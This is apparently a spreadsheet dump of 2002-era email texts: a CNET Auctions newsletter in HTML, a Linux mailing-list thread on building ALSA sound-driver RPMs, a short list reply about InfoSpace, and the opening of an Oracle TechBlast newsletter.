 &lt;p align="center"&gt;&lt;b&gt;&lt;u&gt;&lt;font face="Arial" color="#0000FF" size="3"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLWMEoDXIFUywq2NRJSBTeR" &gt;
 Olympus Brio D-100 1.3 MegaPixel Digital Camera&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;
 &lt;font face="Arial" size="2" color="#0000FF"&gt;&amp;nbsp;&lt;/font&gt;&lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="65%" valign="top" align="left"&gt;
 &lt;br&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;1.3 MegaPixel Resolution&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;8MB Smartmedia Card&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;Seamless 2X Digital Zoom&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;1280 x 960 Pixel Resolution&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;Auto Connect USB Function&lt;/b&gt;&lt;/li&gt;
 &lt;li&gt;&lt;b&gt;&lt;font face="Arial" size="2"&gt;Olympus TruePic Technology&lt;/b&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;/td&gt;
 &lt;td width="35%"&gt;
 &lt;div align="center"&gt;
 &lt;table border="0" cellspacing="0" cellpadding="0"&gt;
 &lt;tr&gt;
 &lt;td width="100%" valign="center"&gt;&lt;center&gt;
 &lt;a href="http://clickthru.online.com/Click?q=92-ubRVQTzF9IEAhCBzeFOPq1FsnysR" &gt;
 &lt;img border="0" src="http://auctions.cnet.com/images/dispatch/olympus_top.gif"&gt;
 &lt;/a&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2" align="center"&gt;
 &lt;font color="#CC0000" face="Arial"&gt;&lt;b&gt;
 Bidding starts at &lt;font size=6&gt; $99&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td width="100%" colspan="2"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;
 &lt;td width="100%" colspan="2" align="center"&gt;&lt;b&gt;&lt;font face="Arial"
 color="#0000FF"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a7-fR_2Q8BskD069pBLF5vLk7KCgFZR" &gt;
 &lt;u&gt;Don't miss out, place your bid now!&lt;/u&gt;&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/div&gt;
 &lt;p&gt;&lt;IMG height=4 src="http://www.cnet.com/b.gif" width=1&gt;&lt;BR&gt;
 &lt;IMG height=1 src="http://www.cnet.com/b.gif" width=8&gt;&lt;/TD&gt;
 &lt;TD width=8&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" 
 width=8&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=430 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif" 
 width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt; &lt;BR&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;
 &lt;DIV style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;
 &lt;!-- main content --&gt;
 &lt;a href="http://clickthru.online.com/Click?q=bc-zkPJQ6BMunENkcUmobF8XEDxwcdR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_hot.gif"
 width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=d1-ulOzQpEQ0CYebsA10-kl0aSxkZcR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/kodak_picmaker.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=e6-qG8rQwy7yD7PzlRXGugH6NQYvURR" &gt;
 &lt;b&gt;Kodak/Lexmark 1200dpi Printer&lt;br&gt;w/FlashCard Reader &amp; Photo LCD&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$49&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=fb-aWErQkg7jGW0-ACoFokcTbTDoVFR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/lexmark82.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPLyxUxBX3VynhNBuCqcR" &gt;
 &lt;b&gt;Lexmark Z-82 Color Copier/Scanner/Printer Combo&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$1&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=26-KqPVIiMxelspOSrBBBkqU8niQ7RR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/gateway.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=3b-XhxVINdxKv3pLEuFPcZsjpRp-LFR" &gt;
 &lt;b&gt;Gateway XP P4 1.5GHz/256MB PC-266/64MB AGP&lt;br&gt;40GB 7200RPM/24x10x40x CD-RW PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$551&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=50-M_CBIR0cwZMQ3l6ASOnO8CtmMg4R" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/monitor.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=65-K82zIDP9dgc7CDQD70VOf0m8P9eR" &gt;
 &lt;b&gt;Sony/Sun .28mm 20-inch Trinitron Monitor&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$9&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=7a-EE_AIPB8prSy2S1hU6coezkBZXyR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/metal_detector.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=8f-OOYvQ8KJgWwrREfXvsg9tyQFWvZR" &gt;
 &lt;b&gt;Hand Held Security Wand Metal Detector&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$16.50&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_fyrbksIC1b2OB8OEuR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/dispatch_PC.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=ba-m-45QXpJTW-bcJVxhOmI_uIUEksR" &gt;
 &lt;b&gt;Intel 900MHz/256MB PC-133/10X DVD-ROM/20GB PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$229&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/icon_gold.gif"&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cf-ebM-QLw1uw7pdXwJaylIO7r3fxZR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_end.gif" width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=e4-ABYFQVkP4jBj5mKI81u0PT_Qv1dR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/canon656u.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=f9-mtKTQxOPEQ94HDISM_svdGheo-cR" &gt;
 &lt;b&gt;Canon CanoScan N670U 48-Bit Flatbed Scanner&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$1&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img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href="http://clickthru.online.com/Click?q=0e--eOTIiQIuxlJGNz4r8dJx98lbKRR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/dispatch_PC.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=23-sFcGINMjnMy40OaiAv2Y9ZZvQKFR" &gt;
 &lt;b&gt;P4 Celeron 1.7GHz/nVidia 32MB&lt;br&gt;256MB PC-133/16x DVD/20GB PC&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$399&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=38-bLkmIRM1EYfRcJCnhJiSUxuD-D9R" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/soundblaster_live.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZkrpZ6Jh6daB0S22bbKAeR" &gt;
 &lt;b&gt;Creative Sound Blaster Live! 5.1 Sound Card&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$1&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/icon_gold.gif"&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;P&gt;
 &lt;/P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePOUIIE4iuG9TmIKJ15BRyR" &gt;
 &lt;img src="http://www.cnet.com/i/nl/au/sub_add.gif" width=310 height=19 border=0&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpw7wmievfx31g9NPmdZPPR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/modem_creative.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=8d-nbL1Q7nmvyTkOXmIiSupcptbPMuR" &gt;
 &lt;b&gt;Creative Blaster 56K PCI V.92 Fax Modem &lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$17.75&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/icon_gold.gif"&gt;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=a2-6-M7QXZHFgG9bxB9R0CGk_HtsosR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/iomega_predator.jpg" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=b7-FOgPQ8JHO5rD2OY0NpbnpTbdL3ZR" &gt;
 &lt;b&gt;Iomega Predator 4x4x6 External USB CD-RW&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$49.99&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0O79aGRROU7qeZDozn6f5dR" &gt;
 &lt;img src="http://auctions.cnet.com/images/dispatch/monitor.gif" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk1PgLospPPhsYK3Awi9qcR" &gt;
 &lt;b&gt;NEC 21-inch .28mm Multi-Sync Monitor&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;tr&gt;&lt;td colspan=3&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; Starting Bid &lt;b&gt;$9&lt;/b&gt;&amp;nbsp;&amp;nbsp;&lt;img src="http://auctions.cnet.com/images/icon_gold.gif"&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://auctions.cnet.com/b.gif" height="3"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=5&gt;&lt;img src="http://auctions.cnet.com/images/gdot.gif" height=1 width=100%&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/font&gt;
 &lt;/table&gt;
 &lt;P&gt;&lt;/P&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a name="h5"&gt;&lt;img src="http://www.cnet.com/i/nl/au/sub_ques.gif"
 width=310 height=19&gt;&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width=410 height=8&gt;&lt;br&gt;
 Please send all questions, comments, and concerns regarding the CNET
 Auctions Newsletter to &lt;a
 href="mailto:auctions@cnet.com"&gt;auctions@cnet.com&lt;/a&gt; and include the
 Newsletter title in the subject line.
 &lt;p&gt;
 &lt;b&gt;NOTE:&lt;/b&gt; All product information, including prices, features, and
 availability, is subject to change without notice.
 &lt;P&gt;
 &lt;a name="h6"&gt;
 &lt;!-- /main content --&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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href="http://clickthru.online.com/Click?q=f6-QktIQMwQkvTRWpQYYRGOT9_JmpRR" &gt;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HREF="http://clickthru.online.com/Click?q=0b-0NN-zBQ8MFn_y6Q_ftSpRM8eiX4jGsRR"&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;
 &lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com'&gt;
 Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=21-UPROIjdkyulmSWYoQqYoj1cTQ4cR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=36-wg7-IiIamXBReoaMxvH3QainXQRR"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href="http://clickthru.online.com/Click?q=4b-k_l7IBUWWWMbAdQP9VA35c54JMlR" &gt;&lt;img
 src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37"
 border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hThc0SDLN8S_eSgFWV4R" &gt;&lt;font
 color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=75-whwtIKU3zF71Qjo_rjups7LLZ5eR" &gt;&lt;font
 color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0VloGk6SSEYIEElDh4B1FR" &gt;&lt;font color="#000000"&gt;Tech
 news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQB7cNjHsKPUByjw2PB1s79R" &gt;&lt;font
 color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7Uq5NydZWZ1PHq15ZNEEZuR"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size="-2"&gt;&lt;tr:ad
 name="copyright"/&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=ca-icRu-TglC1LXyUCC_L2mgWcDhRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for this information.  I gave Alsa a try, couldn't figure out how
 to enable digital out, although I'm sure if I put enough time into it,
 could have gotten it working.  Also when playing mp3s in analog mode,
 every time I switched between mp3s there was a bit of static.  Noticed a
 new distribution geared towards audio applications, AGNULA
 (http://www.agnula.org/) uses Alsa as well.  Seems though the latest
 open source emu10k1 drivers (SBLive! 5.1) work fair enough.  Anyone else
 experience these problems with Alsa?  Are there alot of people on this
 list using Alsa?
 Regards,
 Lance
 On Sat, 2002-08-24 at 17:45, Angles Puglisi wrote:
 &gt; FYI, This is how I make my ALSA rpms ... some people on the (null) list did not
 &gt; realize it was pretty easy.
 &gt; 
 &gt; btw, I do this lot since I've upgraded from RH7.3 to Limbo1 to Limbo2 to Null all in
 &gt; a week (probably).
 &gt; 
 &gt; forward - original mail:
 &gt;   From "Angles Puglisi" &lt;angles@aminvestments.com&gt;
 &gt;   Date 08/24/2002 - 06:38:03 pm
 &gt;   Subject Re: When are we going to get....
 &gt; ----
 &gt; 
 &gt; From:  Angles  Puglisi &lt;angles@aminvestments.com&gt;
 &gt; To: limbo-list@spamassassin.taint.org
 &gt; Subject: Re: When are we going to get....
 &gt; Date: 24 Aug 2002 22:40:40 +0000
 &gt; 
 &gt; OK, I do this every time I update a kernel.
 &gt; 
 &gt; The 1st time I added ALSA, I tried a non-root rpom build but the DEV things were not
 &gt; made. Other than that, I bet you could do non-root. The following can be scripted
 &gt; easily.
 &gt; 
 &gt; 1. get (a) alsa-drivers, (b) alas-lib, and (c) alsa-utils tarballs (if upgrading the
 &gt; kernel then you probably have them from your last install).
 &gt; 2. unpack them somewhere.
 &gt; 3. for each of them, go to the top directory of the unpacked tarball, and do
 &gt; ../configure, then look in (I'm going by memory) TOPDIR/utils/* you should see a spec
 &gt; file there. Do this for the 3 tarballs and you get 3 spec files.
 &gt; 
 &gt; 4. put the source tarballs in SOURCES and the spec files in SPECS, go in order from
 &gt; a, b, then c, doing
 &gt;  "rpmbuild -ba SPECS/alsa-[X].spec; rpm -Uvh RPMS/i386/alsa-[X].rpm"
 &gt; 
 &gt; 5. do that in order for the 3 spec files and you have just installed the alsa
 &gt; drivers on your system. The 1st time you do this you need to put the correct stuff
 &gt; in your modules.conf file (may take some research) then you get the alsa driver and
 &gt; OSS compat capabilities, or you can choose not to use the OOS compat stuff.
 &gt; 
 &gt; Script making the spec, then building and upgrading, as above, and you have
 &gt; "no-sweat" ALSA.
 &gt; 
 &gt; NOTE: the (null) rpmbuild did take some tweaking, it does a check for files in the
 &gt; buildroot that you don't specify in your files section. In this case there is an
 &gt; extra file (going by memory) "/include/sys/asound.h". Add a line at the end on the
 &gt; "install" section of the spec file to delete that file and you are good to go.
 &gt; 
 &gt; Gordon Messmer (yinyang@eburg.com) wrote*:
 &gt; &gt;
 &gt; &gt;On Fri, 2002-08-23 at 03:41, Matthias Saou wrote:
 &gt; &gt;&gt;
 &gt; &gt;&gt; Probably when Red Hat Linux gets a 2.6 kernel ;-) Until then, a few places
 &gt; &gt;&gt; provide good quality alsa packages, but indeed you still have to patch and
 &gt; &gt;&gt; recompile your kernel.
 &gt; &gt;
 &gt; &gt;Not so.  Alsa is build-able independently of the kernel.
 &gt; &gt;
 &gt; &gt;&gt; Maybe some day I'll try ALSA (never done it yet), and that day you can
 &gt; &gt;&gt; expect all needed packages to appear on freshrpms.net :-)
 &gt; &gt;
 &gt; &gt;I'd be interested in working with you on that if you want those
 &gt; &gt;packages.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;_______________________________________________
 &gt; &gt;Limbo-list mailing list
 &gt; &gt;Limbo-list@redhat.com
 &gt; &gt;
 &gt; 
 &gt; --
 &gt; That's "angle" as in geometry.
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : Extracting lines X to Y in a text file         LOST #261
 Use sed ... Syntax: [$sed -n 'X,Yp' &lt; textfile.txt]. Following
 will extract lines 5-10 from textin.fil to textout.fil ... 
 $sed -n '5,10p' &lt; textin.fil &gt; textout.fil
 ####&lt;bish@nde.vsnl.net.in&gt;####################################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Naveen Jain steps down
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday, August 1, 2002, at 11:38 AM, Mike Masnick wrote:
 &gt;  "In other words, those
 &gt; &gt; who don't believe in God, and those who believe in God and InfoSpace.
 &gt; &gt; That's OK -- the nonbelievers will be converted when we become a
 &gt; &gt; trillion-dollar company."
 Verizon Wireless uses InfoSpace for myvzw.net, the last few times I 
 interacted with it, I was less than impressed.
 If it's a example of "Argument from Design", then the Creationists ought 
 to disavow Jain right away.
 -- whump
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get into that summer look
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Oracle Technology Network TechBlast - July 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --next_part_of_message
 e
 e
 ssage
 Content-type: text/plain; charset=iso-8859-1
 --next_part_of_message
 Content-Type: text/html
 &lt;body bgcolor="#FFFFFF" link="#000000" vlink="#000000"&gt;
 &lt;a href="http://otn.oracle.com/index.html" target="_top"&gt;&lt;img src="http://otn.oracle.com/otn300x65.gif" width=300 height=65 border=0 alt="Oracle Technology Network" hspace=5 vspace=5&gt;&lt;/a&gt; 
 &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font size="+2"&gt;OTN 
   TechBlast &lt;/font&gt;&lt;font size="+1"&gt;&lt;br&gt;
   &lt;/font&gt; &lt;i&gt;July 2002 Issue&lt;/i&gt;&lt;/b&gt;&lt;font size="2"&gt;&lt;br&gt;
   &lt;font size="1"&gt;The monthly TechBlast is also available through the &lt;a href="http://otn.oracle.com/techblast/index.htm"&gt;Oracle 
   Technology Network&lt;/a&gt; website.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt; &lt;br&gt;
   &lt;div align="left"&gt; 
     &lt;hr&gt;
   &lt;/div&gt;
 &lt;/div&gt;
 &lt;table width="100%" border="0" cellspacing="10" &gt;
   &lt;tr&gt; 
     &lt;td valign="top" width="14%" &gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;In 
       this issue:&lt;/b&gt;&lt;/font&gt; 
       &lt;table width="100%" border="0" cellspacing="2" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td&gt;&lt;font size="1"&gt;&lt;a href="#topnews"&gt;&lt;img src="http://otn.oracle.com/images/bullets_and_symbols/red_arrow_bullet_10.gif" width="12" height="13" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;&lt;a href="#feature"&gt;This 
             Month's Feature&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td height="12"&gt;&lt;font size="1"&gt;&lt;a href="#newdownloads"&gt;&lt;img src="http://otn.oracle.com/images/bullets_and_symbols/red_arrow_bullet_10.gif" width="12" height="13" border="0"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="1"&gt;&lt;a href="#news"&gt; 
             News&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
